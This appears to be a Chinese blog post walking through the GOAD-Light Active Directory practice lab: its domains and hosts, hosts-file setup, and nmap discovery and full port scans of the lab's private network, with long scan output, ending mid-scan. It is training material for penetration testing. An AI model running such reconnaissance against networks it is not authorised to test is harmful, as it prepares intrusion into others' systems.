{"id":2132,"date":"2026-05-31T20:38:50","date_gmt":"2026-05-31T12:38:50","guid":{"rendered":"https:\/\/koishi.team\/?p=2132"},"modified":"2026-05-31T20:39:47","modified_gmt":"2026-05-31T12:39:47","slug":"goad-light","status":"publish","type":"post","link":"https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/","title":{"rendered":"GOAD-Light"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\"><strong>GOAD-Light<\/strong><strong><\/strong><\/h1>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8fd9\u662f\u4e0d\u5305\u542b essos \u57df\u7684\u8f7b\u91cf\u7ea7 goad \u7248\u672c\u3002\u6b64\u5b9e\u9a8c\u73af\u5883\u4e13\u4e3a\u6027\u80fd\u8f83\u4f4e\u7684\u8ba1\u7b97\u673a\uff08\u6700\u5c0f\u5185\u5b58\u7ea6 20GB\uff09\u6784\u5efa\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u4e0b\u8f7d\u5730\u5740\uff1a<a href=\"https:\/\/github.com\/Orange-Cyberdefense\/GOAD\">https:\/\/github.com\/Orange-Cyberdefense\/GOAD<\/a>&nbsp;<a><\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/orange-cyberdefense.github.io\/GOAD\/labs\/GOAD-Light\">https:\/\/orange-cyberdefense.github.io\/GOAD\/labs\/GOAD-Light<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-77.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"682\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-77.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2134\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u76f8\u5bf9\u4e8e\u5b8c\u6574\u7684GOAD\u7f3a\u5931\u4e86<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u00a0\u8de8 Forest \u653b\u51fb\u573a\u666f<\/li>\n\n\n\n<li>\u00a0MSSQL \u7684 linked server \/ trusted link \u6a2a\u5411\u573a\u666f<\/li>\n\n\n\n<li>\u00a0\u4e00\u4e9b\u4f9d\u8d56\u65e7\u7cfb\u7edf \/ \u65e7\u8865\u4e01\u72b6\u6001\u7684\u6f0f\u6d1e\u573a\u666f<\/li>\n\n\n\n<li>AD CS \u8bc1\u4e66\u670d\u52a1\u653b\u51fb\u573a\u666f<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u57df\u540d\uff1asevenkingdoms.local<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>kingslanding\uff1aDC01 \u8fd0\u884c\u5728 Windows Server 2019 \u4e0a\uff08\u9ed8\u8ba4\u542f\u7528 Windows Defender\uff09<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u57df\u540d\uff1anorth.sevenkingdoms.local<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>winterfell \uff1aDC02 \u8fd0\u884c\u5728 Windows Server 2019 \u4e0a\uff08\u9ed8\u8ba4\u542f\u7528 Windows Defender\uff09<\/li>\n\n\n\n<li>castelblack\uff1aSRV02 \u8fd0\u884c\u5728 Windows Server 2019 \u4e0a\uff08\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u5df2\u7981\u7528 Windows Defender\uff09<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-78.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"734\" height=\"634\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-78.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2135\"  sizes=\"auto, (max-width: 734px) 100vw, 734px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><a><\/a><strong>\u73af\u5883\u51c6\u5907<\/strong><strong><\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728\u6b64\u4e4b\u524d\u5148\u7ed9kali\u6865\u63a5\u4e00\u4e2aVirtualBox\u7684\u7f51\u5361<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u628a\u57df\u540d\u6dfb\u52a0\u5230hosts\u91cc\uff0c\u65b9\u4fbf\u540e\u9762\u590d\u73b0<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>sudo tee -a \/etc\/hosts &lt;&lt;'EOF'<br>192.168.56.10 kingslanding.sevenkingdoms.local sevenkingdoms.local kingslanding<br>192.168.56.11 winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell<br>192.168.56.22 castelblack.north.sevenkingdoms.local castelblack<br>EOF<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\"><a><\/a><strong>\u7f51\u7edc\u53d1\u73b0\u4e0e\u4fe1\u606f\u641c\u96c6<\/strong><strong><\/strong><\/h1>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u9996\u5148\uff0c\u6211\u4eec\u5df2\u77e5\u7f51\u7edc\u8303\u56f4\u662f 192.168.56.0\/24\uff0c\u90a3\u4e48\u5148\u7528 nmap \u626b\u63cf\u5b58\u6d3b\u4e3b\u673a\u548c\u7aef\u53e3\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>nmap -sP 192.168.56.0\/24<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>MAC Address: 08:00:27:16:F2:7B (Oracle VirtualBox virtual NIC)<\/li>\n\n\n\n<li>Nmap scan report for kingslanding.sevenkingdoms.local (192.168.56.10)<\/li>\n\n\n\n<li>Host is up (0.00016s latency).<\/li>\n\n\n\n<li>MAC Address: 08:00:27:0A:A8:40 (Oracle VirtualBox virtual NIC)<\/li>\n\n\n\n<li>Nmap scan report for winterfell.north.sevenkingdoms.local (192.168.56.11)<\/li>\n\n\n\n<li>Host is up (0.00017s latency).<\/li>\n\n\n\n<li>MAC Address: 08:00:27:AD:F6:8F (Oracle VirtualBox virtual NIC)<\/li>\n\n\n\n<li>Nmap scan report for castelblack.north.sevenkingdoms.local (192.168.56.22)<\/li>\n\n\n\n<li>Host is up (0.00023s latency).<\/li>\n\n\n\n<li>kingslanding.sevenkingdoms.local\uff1a192.168.56.10<\/li>\n\n\n\n<li>winterfell.north.sevenkingdoms.local \uff1a192.168.56.11<\/li>\n\n\n\n<li>castelblack.north.sevenkingdoms.local\uff1a192.168.56.22<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u91cd\u70b9\u5c31\u662f\u8fd9\u4e09\u4e2aip\uff0c\u626b\u63cf\u7aef\u53e3\uff0c\u770b\u770b\u6709\u4ec0\u4e48\u670d\u52a1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>nmap -sS -sV -sC -p- -T4 -Pn 192.168.56.10 192.168.56.11 192.168.56.22<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a><\/a><a><\/a>\u250c\u2500\u2500(root\u327fkali)-[~]<\/li>\n\n\n\n<li><a><\/a>\u2514\u2500# nmap -sS -sV -sC -p- -T4 -Pn 192.168.56.10 192.168.56.11 192.168.56.22<\/li>\n\n\n\n<li><a><\/a>Starting Nmap 7.99 ( <a href=\"https:\/\/nmap.org\">https:\/\/nmap.org<\/a>&nbsp;) at 2026-05-31 14:57 +0800<\/li>\n\n\n\n<li><a><\/a>Nmap scan report for kingslanding.sevenkingdoms.local (192.168.56.10)<\/li>\n\n\n\n<li><a><\/a>Host is up (0.00020s latency).<\/li>\n\n\n\n<li><a><\/a>Not shown: 65506 closed tcp ports (reset)<\/li>\n\n\n\n<li><a><\/a>PORT STATE SERVICE VERSION<\/li>\n\n\n\n<li><a><\/a>53\/tcp open domain Simple DNS Plus<\/li>\n\n\n\n<li><a><\/a>80\/tcp open http Microsoft IIS httpd 10.0<\/li>\n\n\n\n<li><a><\/a>|_http-title: IIS Windows Server<\/li>\n\n\n\n<li><a><\/a>|_http-server-header: Microsoft-IIS\/10.0<\/li>\n\n\n\n<li><a><\/a>| http-methods:<\/li>\n\n\n\n<li><a><\/a>|_ Potentially risky methods: TRACE<\/li>\n\n\n\n<li><a><\/a>88\/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-05-31 06:57:06Z)<\/li>\n\n\n\n<li><a><\/a>135\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>139\/tcp open netbios-ssn Microsoft Windows netbios-ssn<\/li>\n\n\n\n<li><a><\/a>389\/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)<\/li>\n\n\n\n<li><a><\/a>| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:kingslanding.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Not valid before: 2026-05-31T02:50:06<\/li>\n\n\n\n<li><a><\/a>|_Not valid after: 2027-05-31T02:50:06<\/li>\n\n\n\n<li><a><\/a>|_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.<\/li>\n\n\n\n<li><a><\/a>445\/tcp open microsoft-ds?<\/li>\n\n\n\n<li><a><\/a>464\/tcp open kpasswd5?<\/li>\n\n\n\n<li><a><\/a>593\/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0<\/li>\n\n\n\n<li><a><\/a>636\/tcp open ssl\/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)<\/li>\n\n\n\n<li><a><\/a>|_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.<\/li>\n\n\n\n<li><a><\/a>| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:kingslanding.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Not valid before: 2026-05-31T02:50:06<\/li>\n\n\n\n<li><a><\/a>|_Not valid after: 2027-05-31T02:50:06<\/li>\n\n\n\n<li><a><\/a>3268\/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)<\/li>\n\n\n\n<li><a><\/a>|_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.<\/li>\n\n\n\n<li><a><\/a>| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:kingslanding.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Not valid before: 2026-05-31T02:50:06<\/li>\n\n\n\n<li><a><\/a>|_Not valid after: 2027-05-31T02:50:06<\/li>\n\n\n\n<li><a><\/a>3269\/tcp open ssl\/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)<\/li>\n\n\n\n<li><a><\/a>| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:kingslanding.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Not valid before: 2026-05-31T02:50:06<\/li>\n\n\n\n<li><a><\/a>|_Not valid after: 2027-05-31T02:50:06<\/li>\n\n\n\n<li><a><\/a>|_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.<\/li>\n\n\n\n<li><a><\/a>3389\/tcp open ms-wbt-server Microsoft Terminal Services<\/li>\n\n\n\n<li><a><\/a>| rdp-ntlm-info:<\/li>\n\n\n\n<li><a><\/a>| Target_Name: SEVENKINGDOMS<\/li>\n\n\n\n<li><a><\/a>| NetBIOS_Domain_Name: SEVENKINGDOMS<\/li>\n\n\n\n<li><a><\/a>| NetBIOS_Computer_Name: KINGSLANDING<\/li>\n\n\n\n<li><a><\/a>| DNS_Domain_Name: sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| DNS_Computer_Name: kingslanding.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| DNS_Tree_Name: sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Product_Version: 10.0.17763<\/li>\n\n\n\n<li><a><\/a>|_ System_Time: 2026-05-31T06:59:26+00:00<\/li>\n\n\n\n<li><a><\/a>| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Not valid before: 2026-05-30T02:31:32<\/li>\n\n\n\n<li><a><\/a>|_Not valid after: 2026-11-29T02:31:32<\/li>\n\n\n\n<li><a><\/a>|_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.<\/li>\n\n\n\n<li><a><\/a>5985\/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)<\/li>\n\n\n\n<li><a><\/a>|_http-server-header: Microsoft-HTTPAPI\/2.0<\/li>\n\n\n\n<li><a><\/a>|_http-title: Not Found<\/li>\n\n\n\n<li><a><\/a>5986\/tcp open ssl\/wsmans?<\/li>\n\n\n\n<li><a><\/a>| ssl-cert: Subject: commonName=VAGRANT<\/li>\n\n\n\n<li><a><\/a>| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant<\/li>\n\n\n\n<li><a><\/a>| Not valid before: 2026-05-29T19:16:32<\/li>\n\n\n\n<li><a><\/a>|_Not valid after: 2029-05-28T19:16:32<\/li>\n\n\n\n<li><a><\/a>|_ssl-date: 2026-05-31T06:59:34+00:00; -14s from scanner time.<\/li>\n\n\n\n<li><a><\/a>| tls-alpn:<\/li>\n\n\n\n<li><a><\/a>| h2<\/li>\n\n\n\n<li><a><\/a>|_ http\/1.1<\/li>\n\n\n\n<li><a><\/a>9389\/tcp open mc-nmf .NET Message Framing<\/li>\n\n\n\n<li><a><\/a>47001\/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)<\/li>\n\n\n\n<li><a><\/a>|_http-server-header: Microsoft-HTTPAPI\/2.0<\/li>\n\n\n\n<li><a><\/a>|_http-title: Not Found<\/li>\n\n\n\n<li><a><\/a>49664\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49665\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49666\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49668\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49673\/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0<\/li>\n\n\n\n<li><a><\/a>49674\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49676\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49679\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49689\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49780\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49862\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49998\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>MAC Address: 08:00:27:0A:A8:40 (Oracle VirtualBox virtual NIC)<\/li>\n\n\n\n<li><a><\/a>Service Info: Host: KINGSLANDING; OS: Windows; CPE: cpe:\/o:microsoft:windows<\/li>\n\n\n\n<li><a><\/a><a><\/a>Host script results:<\/li>\n\n\n\n<li><a><\/a>| smb2-time:<\/li>\n\n\n\n<li><a><\/a>| date: 2026-05-31T06:59:26<\/li>\n\n\n\n<li><a><\/a>|_ start_date: N\/A<\/li>\n\n\n\n<li><a><\/a>|_clock-skew: mean: -14s, deviation: 0s, median: -14s<\/li>\n\n\n\n<li><a><\/a>| smb2-security-mode:<\/li>\n\n\n\n<li><a><\/a>| 3.1.1:<\/li>\n\n\n\n<li><a><\/a>|_ Message signing enabled and required<\/li>\n\n\n\n<li><a><\/a>|_nbstat: NetBIOS name: KINGSLANDING, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:0a:a8:40 (Oracle VirtualBox virtual NIC)<\/li>\n\n\n\n<li><a><\/a><a><\/a>Nmap scan report for winterfell.north.sevenkingdoms.local (192.168.56.11)<\/li>\n\n\n\n<li><a><\/a>Host is up (0.00017s latency).<\/li>\n\n\n\n<li><a><\/a>Not shown: 65508 closed tcp ports (reset)<\/li>\n\n\n\n<li><a><\/a>PORT STATE SERVICE VERSION<\/li>\n\n\n\n<li><a><\/a>53\/tcp open domain Simple DNS Plus<\/li>\n\n\n\n<li><a><\/a>88\/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-05-31 06:57:22Z)<\/li>\n\n\n\n<li><a><\/a>135\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>139\/tcp open netbios-ssn Microsoft Windows netbios-ssn<\/li>\n\n\n\n<li><a><\/a>389\/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)<\/li>\n\n\n\n<li><a><\/a>| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:winterfell.north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Not valid before: 2026-05-31T03:40:45<\/li>\n\n\n\n<li><a><\/a>|_Not valid after: 2027-05-31T03:40:45<\/li>\n\n\n\n<li><a><\/a>|_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.<\/li>\n\n\n\n<li><a><\/a>445\/tcp open microsoft-ds?<\/li>\n\n\n\n<li><a><\/a>464\/tcp open kpasswd5?<\/li>\n\n\n\n<li><a><\/a>593\/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0<\/li>\n\n\n\n<li><a><\/a>636\/tcp open ssl\/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)<\/li>\n\n\n\n<li><a><\/a>| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:winterfell.north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Not valid before: 2026-05-31T03:40:45<\/li>\n\n\n\n<li><a><\/a>|_Not valid after: 2027-05-31T03:40:45<\/li>\n\n\n\n<li><a><\/a>|_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.<\/li>\n\n\n\n<li><a><\/a>3268\/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)<\/li>\n\n\n\n<li><a><\/a>| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:winterfell.north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Not valid before: 2026-05-31T03:40:45<\/li>\n\n\n\n<li><a><\/a>|_Not valid after: 2027-05-31T03:40:45<\/li>\n\n\n\n<li><a><\/a>|_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.<\/li>\n\n\n\n<li><a><\/a>3269\/tcp open ssl\/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local, Site: Default-First-Site-Name)<\/li>\n\n\n\n<li><a><\/a>| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:winterfell.north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Not valid before: 2026-05-31T03:40:45<\/li>\n\n\n\n<li><a><\/a>|_Not valid after: 2027-05-31T03:40:45<\/li>\n\n\n\n<li><a><\/a>|_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.<\/li>\n\n\n\n<li><a><\/a>3389\/tcp open ms-wbt-server Microsoft Terminal Services<\/li>\n\n\n\n<li><a><\/a>|_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.<\/li>\n\n\n\n<li><a><\/a>| rdp-ntlm-info:<\/li>\n\n\n\n<li><a><\/a>| Target_Name: NORTH<\/li>\n\n\n\n<li><a><\/a>| NetBIOS_Domain_Name: NORTH<\/li>\n\n\n\n<li><a><\/a>| NetBIOS_Computer_Name: WINTERFELL<\/li>\n\n\n\n<li><a><\/a>| DNS_Domain_Name: north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| DNS_Computer_Name: winterfell.north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| DNS_Tree_Name: sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Product_Version: 10.0.17763<\/li>\n\n\n\n<li><a><\/a>|_ System_Time: 2026-05-31T06:59:04+00:00<\/li>\n\n\n\n<li><a><\/a>| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Not valid before: 2026-05-30T02:53:40<\/li>\n\n\n\n<li><a><\/a>|_Not valid after: 2026-11-29T02:53:40<\/li>\n\n\n\n<li><a><\/a>5985\/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)<\/li>\n\n\n\n<li><a><\/a>|_http-title: Not Found<\/li>\n\n\n\n<li><a><\/a>|_http-server-header: Microsoft-HTTPAPI\/2.0<\/li>\n\n\n\n<li><a><\/a>5986\/tcp open ssl\/wsmans?<\/li>\n\n\n\n<li><a><\/a>| ssl-cert: Subject: commonName=VAGRANT<\/li>\n\n\n\n<li><a><\/a>| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant<\/li>\n\n\n\n<li><a><\/a>| Not valid before: 2026-05-29T19:18:45<\/li>\n\n\n\n<li><a><\/a>|_Not valid after: 2029-05-28T19:18:45<\/li>\n\n\n\n<li><a><\/a>| tls-alpn:<\/li>\n\n\n\n<li><a><\/a>| h2<\/li>\n\n\n\n<li><a><\/a>|_ http\/1.1<\/li>\n\n\n\n<li><a><\/a>|_ssl-date: 2026-05-31T06:59:15+00:00; -33s from scanner time.<\/li>\n\n\n\n<li><a><\/a>9389\/tcp open mc-nmf .NET Message Framing<\/li>\n\n\n\n<li><a><\/a>47001\/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)<\/li>\n\n\n\n<li><a><\/a>|_http-server-header: Microsoft-HTTPAPI\/2.0<\/li>\n\n\n\n<li><a><\/a>|_http-title: Not Found<\/li>\n\n\n\n<li><a><\/a>49664\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49665\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49666\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49668\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49676\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49677\/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0<\/li>\n\n\n\n<li><a><\/a>49679\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49682\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49711\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>51116\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>57356\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>MAC Address: 08:00:27:AD:F6:8F (Oracle VirtualBox virtual NIC)<\/li>\n\n\n\n<li><a><\/a>Service Info: Host: WINTERFELL; OS: Windows; CPE: cpe:\/o:microsoft:windows<\/li>\n\n\n\n<li><a><\/a><a><\/a>Host script results:<\/li>\n\n\n\n<li><a><\/a>| smb2-time:<\/li>\n\n\n\n<li><a><\/a>| date: 2026-05-31T06:59:04<\/li>\n\n\n\n<li><a><\/a>|_ start_date: N\/A<\/li>\n\n\n\n<li><a><\/a>| smb2-security-mode:<\/li>\n\n\n\n<li><a><\/a>| 3.1.1:<\/li>\n\n\n\n<li><a><\/a>|_ Message signing enabled and required<\/li>\n\n\n\n<li><a><\/a>|_nbstat: NetBIOS name: WINTERFELL, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:ad:f6:8f (Oracle VirtualBox virtual NIC)<\/li>\n\n\n\n<li><a><\/a>|_clock-skew: mean: -33s, deviation: 0s, median: -33s<\/li>\n\n\n\n<li><a><\/a><a><\/a>Nmap scan report for castelblack.north.sevenkingdoms.local (192.168.56.22)<\/li>\n\n\n\n<li><a><\/a>Host is up (0.00031s latency).<\/li>\n\n\n\n<li><a><\/a>Not shown: 65516 closed tcp ports (reset)<\/li>\n\n\n\n<li><a><\/a>PORT STATE SERVICE VERSION<\/li>\n\n\n\n<li><a><\/a>80\/tcp open http Microsoft IIS httpd 10.0<\/li>\n\n\n\n<li><a><\/a>|_http-server-header: Microsoft-IIS\/10.0<\/li>\n\n\n\n<li><a><\/a>| http-methods:<\/li>\n\n\n\n<li><a><\/a>|_ Potentially risky methods: TRACE<\/li>\n\n\n\n<li><a><\/a>|_http-title: Site doesn&#8217;t have a title (text\/html).<\/li>\n\n\n\n<li><a><\/a>135\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>139\/tcp open netbios-ssn Microsoft Windows netbios-ssn<\/li>\n\n\n\n<li><a><\/a>445\/tcp open microsoft-ds?<\/li>\n\n\n\n<li><a><\/a>1433\/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM<\/li>\n\n\n\n<li><a><\/a>| ms-sql-info:<\/li>\n\n\n\n<li><a><\/a>| 192.168.56.22:1433:<\/li>\n\n\n\n<li><a><\/a>| Version:<\/li>\n\n\n\n<li><a><\/a>| name: Microsoft SQL Server 2019 RTM<\/li>\n\n\n\n<li><a><\/a>| number: 15.00.2000.00<\/li>\n\n\n\n<li><a><\/a>| Product: Microsoft SQL Server 2019<\/li>\n\n\n\n<li><a><\/a>| Service pack level: RTM<\/li>\n\n\n\n<li><a><\/a>| Post-SP patches applied: false<\/li>\n\n\n\n<li><a><\/a>|_ TCP port: 1433<\/li>\n\n\n\n<li><a><\/a>| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback<\/li>\n\n\n\n<li><a><\/a>| Not valid before: 2026-05-31T03:46:28<\/li>\n\n\n\n<li><a><\/a>|_Not valid after: 2056-05-31T03:46:28<\/li>\n\n\n\n<li><a><\/a>|_ssl-date: 2026-05-31T06:59:44+00:00; -4s from scanner time.<\/li>\n\n\n\n<li><a><\/a>| ms-sql-ntlm-info:<\/li>\n\n\n\n<li><a><\/a>| 192.168.56.22:1433:<\/li>\n\n\n\n<li><a><\/a>| Target_Name: NORTH<\/li>\n\n\n\n<li><a><\/a>| NetBIOS_Domain_Name: NORTH<\/li>\n\n\n\n<li><a><\/a>| NetBIOS_Computer_Name: CASTELBLACK<\/li>\n\n\n\n<li><a><\/a>| DNS_Domain_Name: north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| DNS_Computer_Name: castelblack.north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| DNS_Tree_Name: sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>|_ Product_Version: 10.0.17763<\/li>\n\n\n\n<li><a><\/a>3389\/tcp open ms-wbt-server Microsoft Terminal Services<\/li>\n\n\n\n<li><a><\/a>| ssl-cert: Subject: 